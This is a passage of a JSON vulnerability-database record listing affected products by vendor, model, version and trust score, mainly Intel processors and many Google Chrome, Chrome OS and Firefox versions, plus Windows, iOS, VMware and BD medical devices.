}, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2365m" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3700" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "620m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770hq" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2370m" }, { "model": "xeon e3 1246 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4402ec" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6142f" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4655_v3" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3745d" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "620ue" }, { "model": "internet explorer", "scope": "eq", "trust": 0.9, "vendor": "microsoft", "version": "11" }, { "model": "edge", "scope": "eq", "trust": 0.9, "vendor": "microsoft", "version": "0" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "amd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "arm", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "cisco", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "dell", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "dell emc", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "hp", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ibm", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "intel", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "microsoft", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "qualcomm incorporated", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "red hat", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "suse linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "synology", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ubuntu", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "vmware", "version": null }, { "model": "windows sp1", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "7" }, { "model": "windows", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "google", "version": "v8" }, { "model": "windows", "scope": "eq", "trust": 0.6, "vendor": "microsoft", "version": "10" }, { "model": "xeon cpu e5-1650", "scope": "eq", "trust": 0.6, "vendor": "intel", "version": "v3" }, { "model": "cortex a57", "scope": null, "trust": 0.6, "vendor": "arm", "version": null }, { "model": "pro a8-9600 r7", "scope": null, "trust": 0.6, "vendor": "amd", "version": null }, { "model": "compute cores 4c+6g", "scope": "eq", "trust": 0.6, "vendor": "amd", "version": "10" }, { "model": "fx -8320 eight-core processor", "scope": null, "trust": 0.6, "vendor": "amd", "version": null }, { "model": "windows server", "scope": null, "trust": 0.6, "vendor": "microsoft", "version": null }, { "model": "enterprise linux server year extended update support", "scope": "eq", "trust": 0.6, "vendor": "redhat", "version": "-47.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1689.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.924.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.110.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375127" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.31" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.51" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.166" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.891.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.15" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.27" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.306.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1012" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1005.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.42" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1039" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.434.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1311.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.687.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.155" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.365.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.879.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.926.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.47255" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.39" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.1.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "44.0.2403.157" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.530.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.58" }, { "model": "facsmelody", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1308.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.633.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.769.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.127" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.785.0" }, { "model": "pro a8-9600 r7 compute cores 4c+6g", "scope": "eq", "trust": 0.3, "vendor": "amd", "version": "100" }, { "model": "windows version for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1015110" }, { "model": "facscanto ii clinical", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.225" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.90" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.11" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.385.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.319.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.908.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.204" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.219" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.374.0" }, { "model": "pyxis ecostation system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.23" }, { "model": "facscanto ii", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.40" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1043" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.604.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.40" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.44" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.150" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.40" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "36.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.756.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.34" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.886.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.123" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.342" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.51" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.233" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.955.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1082.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.760.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1658.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.368.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.594.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.118" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.743.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "62.0.3202.97" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.96365" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "43.0.2357.130" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "63.0.3239.86" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.816.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.393.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.362.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.618.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.628.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.815.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "27.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.423.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "62.0.3202.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.802.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.12" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.17" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.46" }, { "model": "prepstain", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.323.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.804.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.370.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.805.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.789.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.32" }, { "model": "totalys slideprep", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "41.0.2272" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.315" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.55" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.512.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.109" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0.5" }, { "model": "simatic ipc427e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.901.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.729.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.23" }, { "model": "chrome os beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.130.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.483.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.467.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.10" }, { "model": "facslink interface", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.25" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "28" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.16" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.128.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.452.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "40.0.2214.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1017" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.748.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.727.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.302.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.379.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.654.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.32" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": 